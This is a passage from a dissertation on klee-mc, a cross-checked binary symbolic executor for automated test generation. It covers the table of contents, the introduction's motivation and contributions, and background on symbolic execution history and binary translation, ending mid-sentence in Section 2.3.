4.4.5 Coverage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 103
4.5 Floating-Point SMT Solvers . . . . . . . . . . . . . . . . . . . . . . . 104
4.6 Bugs in Linux programs . . . . . . . . . . . . . . . . . . . . . . . . . 106
4.7 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 108
5 Expression Optimization from Program Paths 109
5.1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109
5.2 Symbolic Execution and Expressions . . . . . . . . . . . . . . . . . . 111
5.3 Rules from Programs . . . . . . . . . . . . . . . . . . . . . . . . . . . 113
5.3.1 Reductions on Expressions . . . . . . . . . . . . . . . . . . . . 114
5.3.2 EquivDB . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 115
5.3.3 Rewrite Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . 118
5.4 Rule-Directed Optimizer . . . . . . . . . . . . . . . . . . . . . . . . . 120
5.4.1 Pattern Matching . . . . . . . . . . . . . . . . . . . . . . . . . 120
5.4.2β-reduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122
5.5 Building Rule Sets . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122
5.5.1 Integrity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 123
5.5.2 Transitive Closure . . . . . . . . . . . . . . . . . . . . . . . . 124
5.5.3 Normal Form Canonicalization . . . . . . . . . . . . . . . . . . 124
5.6 Rule Generalizations . . . . . . . . . . . . . . . . . . . . . . . . . . . 125
5.6.1 Subtree Elimination . . . . . . . . . . . . . . . . . . . . . . . 125
5.6.2 Constant Relaxation . . . . . . . . . . . . . . . . . . . . . . . 126
viii
5.7 Evaluation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
5.7.1 Implementation . . . . . . . . . . . . . . . . . . . . . . . . . . 129
5.7.2 Test System . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129
5.7.3 Performance . . . . . . . . . . . . . . . . . . . . . . . . . . . . 130
5.7.4 EquivDB . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
5.7.5 Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 134
5.8 Related Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 136
6 Symbolically Executed Memory Management Unit 137
6.1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 137
6.2 Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 139
6.2.1 Related Work . . . . . . . . . . . . . . . . . . . . . . . . . . . 139
6.2.2 Symbolic Execution and Memory Accesses . . . . . . . . . . . 140
6.3 A Symbolically Executed MMU . . . . . . . . . . . . . . . . . . . . . 142
6.3.1 Address Space Structures . . . . . . . . . . . . . . . . . . . . 142
6.3.2 Soft Handlers . . . . . . . . . . . . . . . . . . . . . . . . . . . 142
6.4 Access Policies and Analysis . . . . . . . . . . . . . . . . . . . . . . . 146
6.4.1 Symbolic Access Translation . . . . . . . . . . . . . . . . . . . 146
6.4.2 Shadowing Memory . . . . . . . . . . . . . . . . . . . . . . . . 150
6.4.3 Unconstrained Pointers . . . . . . . . . . . . . . . . . . . . . . 154
6.5 Evaluation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158
6.5.1 Implementation Complexity . . . . . . . . . . . . . . . . . . . 158
6.5.2 Dispatch Mechanism . . . . . . . . . . . . . . . . . . . . . . . 158
6.5.3 Policy Microbenchmarks . . . . . . . . . . . . . . . . . . . . . 159
6.5.4 Memory Faults in Linux Programs . . . . . . . . . . . . . . . 160
6.5.5 Profiler . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 161
6.5.6 Heap Violations . . . . . . . . . . . . . . . . . . . . . . . . . . 162
6.5.7 Unconstrained Pointers . . . . . . . . . . . . . . . . . . . . . . 164
6.6 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 167
7 Conclusion 168
7.1 Summary of Contributions . . . . . . . . . . . . . . . . . . . . . . . . 168
ix
7.2 Future Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 169
7.2.1 Programs and Modeling . . . . . . . . . . . . . . . . . . . . . 170
7.2.2 Scaling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 171
7.2.3 Coverage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 172
7.2.4 Types of Analysis . . . . . . . . . . . . . . . . . . . . . . . . . 173
7.3 Final Thoughts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 174
A Glossary 175
Bibliography 179
x
List of Tables
2.1 Number of experimental programs for symbolic execution systems. . . 14
2.2 Selected interpreter intrinsic extensions for runtime libraries. . . . . . 35
2.3 Snapshot counts for binary program collections . . . . . . . . . . . . 41
2.4 Selected command lines triggering memory access faults . . . . . . . . 45
2.5 Selected file inputs triggering memory access faults . . . . . . . . . . 46
2.6 Amount of machine code covered by klee-mc . . . . . . . . . . . . . 46
3.1 Mass checking and cross-checking results on Ubuntu Linux programs. 71
3.2 Valid x86-64 code causing VEX to panic, corrupt register state, or
invoke divergent behavior. . . . . . . . . . . . . . . . . . . . . . . . . 74
3.3 VEX decoder errors found with a static register file. . . . . . . . . . . 75
3.4 Comparison between model and operating system with LTP suite. . . 77
4.1 Rewritten LLVM instructions with corresponding SoftFloat functions 92
4.2 Floating-point operation test cases from symbolic execution. . . . . . 96
4.3 JIT register log cross-checking failures on floating-point library self-tests 98
4.4 Selected library bugs from soft floating-point library consistency tests 99
4.5 Hardware cross-check errors from all distinct floating-point tests . . . 101
4.6 Conformance and library test cases applied to several FPA solvers . . 106
4.7 Bugs found in Linux programs following floating-point computation . 107
5.1 Lines of code for expression optimization . . . . . . . . . . . . . . . . 129
6.1 Trap handler functions for a handler named mwith access bit-widths
w={8,16,32,64,128}. . . . . . . . . . . . . . . . . . . . . . . . . . . 144
xi
6.2 Runtime primitives for memory access . . . . . . . . . . . . . . . . . 145
6.3 Lines of code for MMU components. . . . . . . . . . . . . . . . . . . 158
6.4 Access faults found with symMMU . . . . . . . . . . . . . . . . . . . 161
6.5 symMMU-derived Heap Violations . . . . . . . . . . . . . . . . . . . 163
6.6 Mismatches against glibc involving unconstrained pointers . . . . . . 167
xii
List of Figures
2.1 A symbolically executed program and its decision tree. . . . . . . . . 11
2.2 Stages of translation annotated by propagation of symbolic state. . . 22
2.3 A solver stack with query serialization isolation. . . . . . . . . . . . . 30
2.4 A library intrinsic to enumerate predicated values . . . . . . . . . . . 36
2.5 Function entry hooks for process exit functions . . . . . . . . . . . . . 39
2.6 Snapshot storage overhead before and after deduplication . . . . . . . 42
2.7 Test cases and paths found during mass testing . . . . . . . . . . . . 43
2.8 Bugs found during mass testing . . . . . . . . . . . . . . . . . . . . . 44
2.9 Observed system call frequency over all programs . . . . . . . . . . . 47
3.1 A user’s limited perspective of a bad path. . . . . . . . . . . . . . . . 51
3.2 A binary symbolic execution stack with multiple replay facilities. . . . 53
3.3 Building a test log during symbolic execution . . . . . . . . . . . . . 57
3.4 Test case log record structures for system calls . . . . . . . . . . . . . 58
3.5 The process for comparing model and operating system side effects. . 61
3.6 Symbolic decoder cross-checking data flow. . . . . . . . . . . . . . . . 63
3.7 Symbolic register file derived constraints to trigger a conditional jump. 65
3.8 Cross-checking two expression builders. . . . . . . . . . . . . . . . . . 67
3.9 A broken floating-point division sequence. . . . . . . . . . . . . . . . 72
3.10 Cumulative time distribution to build register logs for each test case. 73
3.11 Number of basic blocks checked against register log as a function of time. 74
3.12 Time to verify machine-derived rewrite rules. . . . . . . . . . . . . . . 78
3.13 Translation rule test with undefined result. . . . . . . . . . . . . . . . 79
3.14 Bad multiply caught by cross-checking. . . . . . . . . . . . . . . . . . 80
xiii
3.15 A faulty hard-coded optimization . . . . . . . . . . . . . . . . . . . . 80
4.1 IEEE-754 format for single and double precision floating-point data . 88
4.2 Generating program tests and cross-checking soft floating-point . . . 95
4.3 Floating-point test case distribution . . . . . . . . . . . . . . . . . . . 100
4.4 Mistranslation of the cvtsi2ss instruction in the VexIR . . . . . . . 102
4.5 Soft floating-point library code coverage and total covered instructions 104
4.6 A Z3 test case query for checking a single-precision division result . . 106
5.1 Percent time for queries . . . . . . . . . . . . . . . . . . . . . . . . . 110
5.2 Total external solver calls . . . . . . . . . . . . . . . . . . . . . . . . 110
5.3klee Expression Language Grammar . . . . . . . . . . . . . . . . . . 111
5.4 Storing and checking an expression against the EquivDB . . . . . . . 115
5.5 An example translation verification query . . . . . . . . . . . . . . . 117
5.6 Expression reduction rule grammar . . . . . . . . . . . . . . . . . . . 119
5.7 Acceptance of constant widths on expression equivalence class hits . . 126
5.8 Percentage of queries submitted using rule sets over baseline . . . . . 131
5.9 Percent time for expression optimization over baseline . . . . . . . . . 131
5.10 Query time distribution for baseline and rule test cases . . . . . . . . 133
5.11 Distribution of expressions by node count and bitwidth in EquivDB . 134
5.12 Program rule sharing. . . . . . . . . . . . . . . . . . . . . . . . . . . . 135
5.13 Rules for measured programs. . . . . . . . . . . . . . . . . . . . . . . 135
6.1 Symbolic memory access example code and its intermediate expressions.138
6.2 A memory object shared among three states, an object state shared
between two states, and an unshared object state. . . . . . . . . . . . 142
6.3 The symMMU pointer handling path. . . . . . . . . . . . . . . . . . . 144
6.4 Range checking handler for 8-bit loads. . . . . . . . . . . . . . . . . . 147
6.5 Address concretization for 8-bit loads. . . . . . . . . . . . . . . . . . . 148
6.6 Retrieving a disjunction of shadow values for a symbolic address. . . . 151
6.7 The memcheck shadow state machine. . . . . . . . . . . . . . . . . . 153
6.8 Unconstrained pointer structures. . . . . . . . . . . . . . . . . . . . . 155
xiv
6.9 String microbenchmark testing speed-up. . . . . . . . . . . . . . . . . 161
6.10 Profiler benchmark performance. . . . . . . . . . . . . . . . . . . . . 162
6.11 A tortuous heap read violation in cpio . . . . . . . . . . . . . . . . . . 164
6.12 Simplified IP address parser from musl . . . . . . . . . . . . . . . . . . 166
xv
Chapter 1
Introduction
Complex software rarely functions as intended without going through considerable
testing. Designing and implementing sufficient tests by hand is an arduous task;
automated program analysis tools for finding software bugs promise to help shift
this burden to machines. Unfortunately, such tools are no different from any other
software; they are difficult to correctly construct, test, and debug. This work argues
these challenges become tractable for at least one analysis technique, dynamic binary
symbolic execution, by lacing self-testing capabilities and interchangeable components
throughout the execution stack.
1.1 Motivation
Software defects, despite decades of experience and error, still continue to pose se-
rious risk. Complex computer-controlled systems such as rockets [16] and medical
devices [85] infamously demonstrate two instances of historically catastrophic soft-
ware flaws. Failure to account for coding mistakes and undesirable edge cases means
more than crashed computers and lost work, but also malicious destruction of nu-
clear centrifuges [83], loss of virtual assets [62] and global disruption of public key
encryption infrastructure [112].
Standard software engineering uses a variety of processes and practices to im-
prove code quality. These processes cover an extensive range of techniques, spanning
1
CHAPTER 1. INTRODUCTION 2
from unit tests for dynamically validating software component functionality to static
verification that program properties unconditionally hold. Testing [56], in general,
can describe errors in deployed software, detect functional regressions introduced by
code updates, or assist when creating new features, such as with test-driven devel-
opment [14]. Such test cases challenge the target code with a sequence of inputs
then comparing the computed results against an expected result. Although testing
is commonly automated, test cases are typically developed by a programmer, incur-
ring additional development costs. Worse, testing rarely proves the absolute absence
of errors. Likewise, verification systems cannot infer all intended behavior, hence
requiring programmer-defined specifications or code annotations to guide analysis.
Ideally, there would be a software tool that could generate complete test case
suites capable of covering all distinct behavior in any given program. A software
developer would then simply review these test cases, checking for intended behavior,
and repair all critical bugs. Unfortunately, Rice’s theorem [111] proves the unde-
cidability of discovering non-trivial software defects, such as memory access faults,
buffer overflows, and division by zero, for arbitrary programs. Instead, approaches to
automating program analysis must compromise.
Traditionally these approaches are broadly categorized as either static or dynamic.
A static analysis processes code structure, and therefore has excellent coverage, but
must overapproximate program state to complete in finite time. A dynamic analysis
executes code, and therefore struggles to achieve adequate coverage, but its knowledge
of program state can be precise. In both cases, these algorithms must occasionally
either overlook or misreport program errors.
Despite the intrinsic limits, systems built to analyze programs are effective enough
to be useful in practice [17]. However, a fundamental syllogism still remains: soft-
ware has bugs and program analysis systems are software, therefore these systems
have bugs; a poor implementation promptly undermines any theoretical guarantees.
First, if there is a bug in the system, the exact point of failure is rarely obvious.
Second, poor or overspecialized optimization from tuning for small benchmarks leads
to performance anomalies over diverse program sets. Third, an incomplete or partial
CHAPTER 1. INTRODUCTION 3
implementation that diverges from a precise machine representation due to techni-
cal limitations (e.g., pure source-based analysis) can ignore important code, casting
aside potential sources of defects. Finally, new analysis passes must undergo a lengthy
debugging phase when the system is poorly constructed or pathologically coupled.
In the past, users could be expected to file detailed tool bug reports. As program
analysis systems become more sophisticated and deployments begin to analyze thou-
sands of programs at a time, such a mindset is no longer adequate; too few people
understand the system to make sense of the vast amount of data by hand. To realis-
tically advance the state of the art, a program analysis tool should now be designed
to identify and minimize its own defects.
1.2 Challenges in Symbolic Execution
Symbolic execution systems are especially well-suited to identifying their own errors.
They are dynamic so it is possible to compare intermediate computations against a
baseline execution. They generate their own test cases so they need minimal, if any,
application-specific customization and can therefore process a large class of programs
with little effort. They are sophisticated enough to be interesting.
This thesis primarily deals with correctness and performance for a binary symbolic
execution. Although most of this work applies to symbolic execution in general, a
binary symbolic executor has the convenient property in that its expected ground
truth directly corresponds to a readily available machine specification: physical hard-
ware. Coincidentally, machine code is a popular distribution format for programs;
a great deal of software is already packaged for the executor. Analyzing very large
program sets compounds the problem of dealing with the complicated inner-workings
of a binary symbolic executor to such an extent that debugging and tuning such a
system by hand quickly becomes impractical.
Addressing all open problems for symbolic execution is outside the scope of this
dissertation; we focus on a small but tractable subset. Namely, we observe that a
straightforward binary symbolic execution system on its own is naturally unreliable
and rife with performance pitfalls. First, correctly interpreting code symbolically is
CHAPTER 1. INTRODUCTION 4
rather difficult; since so much state is kept symbolic, an errant computation poten-
tially first manifests far from the point of error. Second, even running common types
of code symbolically, such as floating-point instructions, remains a subject of sus-
tained research. Third, symbolic overhead tends to create very complex expressions
that ruin performance. Finally, building rich metadata describing state, necessary
for many dynamic analysis algorithms, directly into the executor demands onerous
changes to the core system.
1.2.1 Accuracy and Integrity
A symbolic executor runs program code over symbolic inputs to discover paths for
test cases. This involves interpreting the program using symbolic data, symbolically
modeling environment inputs, managing path constraints, and constructing tests by
solving for symbolic variable assignments. For every test case, replacing all symbolic
inputs with a concrete variable assignment should reproduce the followed path.
However, symbolic execution systems are imperfect. An executor may misinterpret
the code. Its symbolic system model, whether emulating system calls or standard
libraries, may diverge from the target environment. Expressions may be misoptimized
and constraints may be corrupted. With this in mind, there is no guarantee a test
case will accurately reflect the derived path when run through the program on a
physical machine.
In light of executor flaws, there are a few options. If a test case fails to replay
its path, the result may simply be thrown away as a false positive; the user never
sees a bad result. If the problem is found to be in the executor itself, the tool author
may be alerted to the problem. However, if the bug is only observed in one or two
programs, it will be marked low priority; determining the cause of the tool bug can be
prohibitive. Worse, if the false positive depends on non-determinism in the executor,
it may be impossible to reliably reproduce the error.
CHAPTER 1. INTRODUCTION 5
1.2.2 Floating-Point Code
User-level programs commonly include floating-point code. If a symbolic executor
supports a wide class of programs then it must handle floating-point instructions.
When floating-point code is symbolically modeled, it should model floating-point
data symbolically by precisely tracking floating-point path constraints. Likewise, the
paths and values should match hardware.
Integer code is necessary for symbolic execution but floating-point is an enhance-
ment. Compared to integers, floating-point operations have complicated semantics
which are more difficult to model correctly. From a design standpoint, treating all
data as integers simplifies the executor implementation by limiting expression types.
Finally, although there are plenty of integer constraint solvers, there are compara-
tively fewer, let alone efficient, floating-point solvers.
Hence the challenge to supporting floating-point code involves striking a balance
among performance, analysis precision, and system complexity. While concretizing
floating-point data [28] avoids symbolic computation entirely, achieving good perfor-
mance with few system modifications, the state becomes underapproximated, losing
paths. Conversely, fully modeling floating-point data precisely [6, 10, 20] keeps all
paths at the cost of additional system complexity and floating-point solver overheads.
Strangely, considering floating-point’s infamous peculiarities [61], testing the correct-
ness of floating-point symbolic execution itself is given little attention.
1.2.3 Expression Complexity
In order to maintain symbolic state, a symbolic executor translates operations from
instructions into symbolic expressions . When there is significant live symbolic data,
the executor generates a great deal of expressions. By keeping expressions small, the
executor reduces overall constraint solver overhead, a main performance bottleneck.
Ideally, expressions would be internally represented using the fewest nodes possible.
These expressions tend to grow quite large despite having logically equivalent,
smaller representations. In essence, building expressions strictly according to the
instruction stream ignores opportunities to fold operations into smaller expressions.
CHAPTER 1. INTRODUCTION 6
Binary symbolic execution magnifies this problem; the most efficient machine code
can induce expression dilation under symbolic execution. Therefore it is important
for a symbolic executor to include an expression optimization component.
Expression optimizations are often coded into the executor as needed. Typically,
the system author observes a program symbolically executes poorly, manually inspects
the expressions, then hand-codes an expression rewrite rule to fix the problem. Even
if this ad-hoc approach could scale to thousands of programs, simply changing a
compiler optimization level would call for a fresh set of rewrite rules. More worrying,
these rules often rely on subtle two’s complement properties, but, since they are
hand-coded, their correctness is difficult to verify.
1.2.4 Memory Access Analysis
Like other dynamic analysis techniques, dynamic symbolic execution can infer extra
semantic information from program memory access patterns. Since pointers may be
symbolic expressions in addition to classical concrete values, the symbolic executor has
the opportunity to apply policy decisions that extend beyond a traditional concrete
dynamic analysis approach. Such policies range from precise symbolic access tracking
to symbolically shadowing program memory with rich metadata.
There is no obviously superior way to handle symbolic memory accesses. Ul-
timately, the access policy and workload greatly affects symbolic execution perfor-
mance, making both underapproximation and overapproximation attractive options.
Although supporting a multitude of policies would be advantageous, symbolic ac-
cesses introduce new edge cases that can easily corrupt state; new policies must be
thoroughly tested. Likewise, built-in reasoning over symbolic state at the executor
level quickly obscures the meaning of any sufficiently sophisticated access analysis.
Contemporary systems disagree on symbolic access policy, suggesting it should
be configurable and tunable. These systems may underapproximate by concretiz-
ing pointers [58, 92], thus losing symbolic state, or precisely reason about accesses by
maintaining symbolic state and possibly forking [28, 29, 52], incurring significant run-
time overhead in the worst case. More complicated runtime policies that manipulate
CHAPTER 1. INTRODUCTION 7
or analyze accesses require deep changes to the executor’s memory subsystem [110],
making development prohibitively difficult. All the while, there is no clean and iso-
lated mechanism for dispatching memory accesses; all policies are directly coded into
the interpreter, cluttering and destabilizing the core system.
1.3 Contributions
This dissertation applies methods for self-testing and validation to the issues outlined
in Section 1.2. The core idea relies on the observation that executor components
are interchangeable, have comparable results, rarely fail in the same way, and hence
can test themselves; checking unreliable components against one another, or cross-
checking , accurately narrows down intricate system bugs. Cross-checking the system
establishes a solid base to build higher-order features with additional self-testing
functionality.
The main contributions of this dissertation are:
1. The design, implementation, and evaluation of a cross-checked dynamic binary
symbolic executor. The system uses a combination of deterministic replay,
intermediate state logging, and model checking to automatically piecewise val-
idate the correctness of symbolically executed paths. Validating correctness
with cross-checking mechanically detects corrupted computation both near the
point of failure in the target program path and close to the failing executor
component. Cross-checking simplifies the tool debugging process by succinctly
describing bugs otherwise missed in the deluge of data from analyzing programs
by the thousand. Aside from detecting tool bugs, this is the first binary sym-
bolic executor which can confirm the correctness of symbolically derived paths
from the symbolic interpreter down to the hardware.
2. A self-testing system for symbolically executing floating-point code with soft
floating-point libraries. To support symbolic floating-point data using only a
bit-vector arithmetic constraint solver, the executor rewrites floating-point in-
structions to call into integer-only soft floating-point libraries. This approach
CHAPTER 1. INTRODUCTION 8
dramatically lessens the effort necessary for symbolically evaluating floating-
point data over prior work by reusing code meant for emulating floating-point in-
structions on integer-only computer architectures. Furthermore, this approach
is self-testing; since the underlying implementation is no different from any other
code; symbolically executing each library with symbolic inputs produces high-
coverage test cases for floating-point operations. Applying these tests against
all soft floating-point libraries, floating-point constraint solvers, and hardware,
uncovers serious library and floating-point constraint solver bugs.
3. An expression optimizer which automatically discovers and generates useful re-
duction rules. The optimizer exercises the hypothesis that programs are locally
similar and therefore symbolically executing a large set of distinct programs
will produce structurally different but semantically equivalent expressions. To
this end, the optimizer learns reduction rules for rewriting large expressions to
smaller expressions by searching a novel fingerprint based global store of ex-
pressions observed during symbolic execution. These rules are compatible with
cross-checking and can be validated as they are applied at runtime. Unlike
ad-hoc hand-written rewrite rules, every rule translates to a constraint satisfac-
tion query for proving the rule’s correctness offline. Finally, the learned rules
demonstrably reduce the number of constraint solver calls and total solver time
when applied to a set of thousands of binary programs.
4. An efficient symbolically executed memory access mechanism and set of symbol-
ically executed memory access policies. A novel memory dispatch mechanism,
termed the symMMU , forwards target program memory accesses to special run-
time code. This shifts otherwise expensive and complicated memory access
policies away from executor scope to the target program scope which is better
suited for reasoning about symbolic data. Policies become easier to implement
and less susceptible to performance anomalies; the symMMU reimplementation
of the default access policy both detects more program bugs and reports fewer
false positives. Furthermore, multiple policies can be stacked to seamlessly com-
pose new policies. Finally, new policies written against the symMMU extend the
CHAPTER 1. INTRODUCTION 9
symbolic executor’s functionality to use heavy-weight metadata without inva-
sive executor changes; these policies include an access profiler, a heap violation
checker, and lazy buffer allocation.
Chapter 2
The klee-mc Binary Program
Symbolic Executor
2.1 Introduction
This chapter outlines the background for symbolic execution along with the design of
klee-mc , a machine code revision of the klee symbolic executor and the basis of this
dissertation. The intent is to provide a context for the next chapters’ topics under
one coherent overview. This chapter also describes and justifies important klee-mc
features in detail which, although integral to the system’s operation as a whole, are
primarily incidental to the content of other chapters.
The rest of this chapter is structured as follows. First, Section 2.2 provides a
primer on symbolic execution and a survey of systems from past to present. Sec-
tion 2.3 follows an example symbolic execution of a binary program using klee-mc .
Section 2.4 highlights significant design choices made in the klee-mc system. Sec-
tion 2.5 gives results from applying klee-mc to a large set of programs across three
architectures. Finally, Section 2.6 makes a few concluding remarks.
10
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 11
1 i n t main ( void ) {
2 i n t x = 0 , y = 0 ;
3 read (0 , &x , 4 ) ;
4 read (0 , &y , 4 ) ;
5 i f ( x >10)
6 return 2 ;
7 e l s e i f ( y >7)
8 return 3 ;
9 return 0 ; }
Figure 2.1: A symbolically executed program and its decision tree.
2.2 Background
Conceivably, dynamic symbolic execution is a straightforward extension to normal
program execution. Systems that mark inputs as symbolic then explore the feasible
program paths have been known since at least the 1970s, but research stagnated, likely
due to a combination of hardware limitations and high overheads. However, within
the past decade there has been a flurry of developments in source-based symbolic
execution systems [108]. Following this trend, many symbolic executors now target
machine code (i.e., “binary”) programs, although with considerable difficulty.
2.2.1 Symbolic Execution
Symbolic execution is a dynamic analysis technique for automated test-case gener-
ation. These test cases describe paths to bugs or interesting program properties in
complicated or unfamiliar software. Conceptually, inputs (e.g., file contents, net-
work messages, command line arguments) to a program are marked as symbolic and
evaluated abstractly. When program state reaches a control decision, such as an if
statement, based on a symbolic condition, a satisfiability query is submitted to a the-
orem prover backed solver. For an if, when the symbolic condition is contingent the
state forks into two states, and a corresponding predicate becomes a path constraint
which is added to each state’s constraint set . Solving for the state’s constraint set
creates an assignment, or test case, which follows the state’s path.
Figure 2.1 illustrates symbolic execution on a simple C program. On the left, a
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 12
program reads integers xandyfrom file descriptor 0 (conventionally, the “standard
input”), then exits with a return code which depends on the input values. Assuming
theread succeeds, the symbolic executor marks the inputs xandyas symbolic.
Based on these symbolic inputs and given enough time, the executor follows every
feasible program path, illustrated by complete decision tree on the right. Each internal
node represents a control decision, each edge describes a path constraint imposed by
making a control decision, and each leaf is a path termination point. At the root of
the tree is the first control decision, whether x >10. Sincexis unconstrained, the
executor forks the program into two states, adding the path constraint {x >10}to
one and its negation, {x≤10}, to the other. The nodes in gray highlight a single
complete path through the decision tree; the union of edges in the path define the
path’s unique constraint set, {x≤10, y > 7}in this case. Solving for a satisfying
variable assignment of the constraint set gives concrete inputs which reproduce that
path (e.g.,{x= 10,y= 8}); this is the path’s test case . By completely traversing
the decision tree the executor follows all possible control decisions for the program
given inputs xandy. By solving for the constraints leading to each leaf, the executor
produces tests for every possible program path.
Unlike more established systems software such as databases, operating systems,
or compilers, a complete design philosophy for symbolic executors remains somewhat
ill-defined. Still, common themes and patterns emerge; these are reflected in the
klee-mc description in Section 2.4. First, symbolic executors have a fundamental
data type of expressions over symbolic variables ( §2.4.3) which precisely describe
operations over symbolic inputs. The sources of these inputs, such as file or network
operations, must be defined with a system model (§2.4.5) to mark data symbolic
when appropriate for the target program’s platform. When used in control decisions,
such inputs form path constraints with solutions derived by a constraint solver based
on some satisfiability decision procedure. From the solver’s solutions, a symbolic
executor must generate test cases. Since the number of paths in a program may
be infinite, a symbolic executor must choose, or schedule ( §2.4.4), some paths to
evaluate first before others.
Historically, the first symbolic execution systems appeared in the late 1970s [21,
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 13
39, 69, 77, 109]. The genesis of symbolic execution is most often attributed to King’s
EFFIGY [77] system, perhaps due to his earlier work on program verification. On the
other hand, several contemporary projects were similar in that they symbolically ex-
ecuted FORTRAN source code [39, 69, 109]. The SELECT [21] system, whose group
equally acknowledged King (seemingly sharing preprints) but published slightly ear-
lier, has the distinction of processing LISP. Regardless, due to the weaknesses of
hardware and constraint solvers of the time, these systems were typically cast as en-
hanced interactive proof systems and were limited to analyzing small programs. The
authors of CASEGEN [109], for instance, note execution rates of 10 statements per
CPU-second and processing times of half a second for each constraint (limit 10 con-
straints). At a high level, all shared the basic concept of assigning states constraints by
way of control decisions predicated on symbolic data. Likewise every system acknowl-
edged modern problems in symbolic execution, such as handling language primitives,
environment modeling, path explosion by loops, and indexing symbolic arrays.
Since the early 2000’s, symbolic execution has undergone a period of intense
renewed interest. A large variety of new systems have emerged, most processing
source code or intermediate representation code. These systems include support
.NET [127], C [29, 58, 119], C++ [86], Java [75, 133], Javascript [4], LLVM [28],
PHP [5], and Ruby [31] to name a few. Usually the aim of this research is di-
vided between targeting symbolic execution of new types programs (e.g., through
a different language or modeling new features), possibly detecting new types of
bugs [10, 45, 87, 116, 122] and new algorithms for improving performance on ex-
pensive workloads [27, 35, 81, 121, 130, 134].
Certainly the technology behind symbolic execution has vastly improved, but it
is unclear to what extent. In essence, too few programs are analyzed, it is difficult to
verify the bugs in these programs, and the programs require significant manual con-
figuration. Table 2.1 lists a small survey of the total programs tested under a variety
of published symbolic execution systems. Although the average dearth of tested pro-
grams in practice may be justifiable due to type of code being tested (e.g., there are
only so many operating system kernels), it raises serious questions regarding whether
many techniques are effective overall or merely reflect considerable fine-tuning.
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 14
Project Programs
Apollo [5] 6
Artemis [4] 10
BitScope [23] 8
CatchConv [96] 7
Cloud9 [37] 107
CREST [27] 3
CUTE [119] 8
DART [58] 3
EXE [29] 8
FuzzBall [92] 4
GKLEE [87] 22
KLEE [28] 440
KLOVER [86] 9Project Programs
MACE [35] 4
ParSym [121] 2
PathFinder [75] 2
Pex [127] 9
S2E [34] 8
SAGE [59] “100s”
SCORE [76] 6
Splat [134] 4
TaintScope [130] 19
Thresher [18] 7
VexSym [65] 4
Woodpecker [44] 136
zesti [91] 91
Table 2.1: Number of experimental programs for symbolic execution systems.
2.2.2 Binary Symbolic Execution
Since this work concerns dynamic binary symbolic execution, we pay special attention
to its development. These systems hold the promise of supporting a large class of
programs without the need for hand tuning. At its core, a binary symbolic execu-
tor combines the two well-established disciplines of symbolic execution and dynamic
binary translation to run machine code programs. On the other hand, the exten-
sive range of software compatible with a binary symbolic executor can make it a
victim of its universality; obscure programs pave way for obscure executor bugs (of-
ten exacerbated by additional system complexity), the flood of new analysis data is
unmanageable by hand, and designing optimizations on a per-program basis rapidly
yields diminishing returns.
The convenience of applying dynamic analysis to unmodified program binaries led
to binary symbolic execution [30, 34, 59, 92, 96, 124, 131]. Under binary symbolic ex-
ecution, compiled executables are symbolically processed as-is and unmodified; there
is no intrinsic need for recompilation, annotations, or special linking. If a program
can run on its host system, it should be possible to subject it to binary symbolic
execution provided a suitable symbolic system model to simulate host inputs.
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 15
Dynamic binary translators (DBTs) heavily influenced the design of dynamic bi-
nary symbolic executors. Unlike a static binary translator, a DBT translates machine
code on demand as a target program runs; all relevant code falls under a DBT’s
purview. A DBT translates machine code instructions into a simplified intermedi-
ate representation, possibly modifying the code’s semantics, before recompiling the
data to the host’s instruction format. In practice, DBTs are deployed to transpar-
ently optimize programs [7] emulate code across computer architectures [15, 33], and
dynamically instrument code for program analysis [89, 100, 125].
A typical binary symbolic execution system pairs a traditional symbolic executor
with a dynamic binary translation front-end; the DBT converts a program’s ma-
chine code to simpler instructions suitable for symbolic execution. Many dynamic
binary symbolic executors reuse off-the-shelf DBT software (machine decoding is
non-trivial [103]) such as Pin [32], QEMU [34], and Valgrind [65, 92, 96]. On the
other hand, it is possible to build a binary symbolic executor using static disassem-
bly [131], but at the cost of some system flexibility. Similarly, some systems use
custom decoders [30, 59], although admittedly still with some trouble [60].
The thousands of arbitrary machine code programs immediately available for bi-
nary symbolic execution presents a fresh set of challenges. A dynamic binary symbolic
executor intrinsically comprises a complicated, sophisticated stack of unreliable com-
ponents; it will break in unexpected ways. Worse, the complexity and depth of execu-
tion within such a system leaves little recourse for swiftly repairing observed defects.
Even if the executor appears to perform as intended, understanding results from thou-
sands of programs requires considerable expertise. Similarly, shortcuts for improving
the executor, whether by focusing on several programs or piling on highly-coupled fea-
tures that brazenly cut across separated concerns, either attains imperceivable gains
across many programs or leaves the system incomprehensible and unworkable. This
dissertation demonstrates that addressing these challenges directly makes it possible
to rapidly develop a stable, novel, and mature binary symbolic executor.
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 16
2.3 Generating Tests with klee-mc
Although klee-mc works best as an automated system, using a collection of scripts
for bulk processing, this section is meant to walk through the basic process for running
a binary program under klee-mc . For this example, we will use the LLVM opt
